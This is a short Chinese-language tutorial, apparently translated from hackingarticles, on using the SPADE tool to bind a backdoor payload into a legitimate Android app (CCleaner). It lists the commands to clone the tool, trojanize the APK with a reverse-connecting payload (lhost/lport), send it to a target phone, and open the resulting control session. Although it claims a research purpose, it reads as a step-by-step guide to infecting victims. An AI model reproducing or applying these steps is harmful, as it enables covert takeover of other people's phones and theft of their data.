SPADE,一款安卓手机的后门控制工具,安全研究人员可以以此了解和研究安卓后门原理。
首先,我们从网站www.apk4fun.com下载apk文件,如ccleaner。然后,我们安装spade
git clone https://github.com/suraj-root/spade.git
之后,利用以下命令开始捆绑恶意载体
./spade.py /root/Desktop/ccleaner.apk
有6种不同payload可供选择,设置完lhost和lport,将会生成恶意payload
选择设置listener之后,一个新的apk生成了
好了,你可以向目标手机发送apk或下载链接了,apk程序安装的同时,将会执行我们设置的恶意payload。
之后,通过命令查看实际控制效果
sessions –i 1
*参考来源:hackingarticles,FB小编clouds编译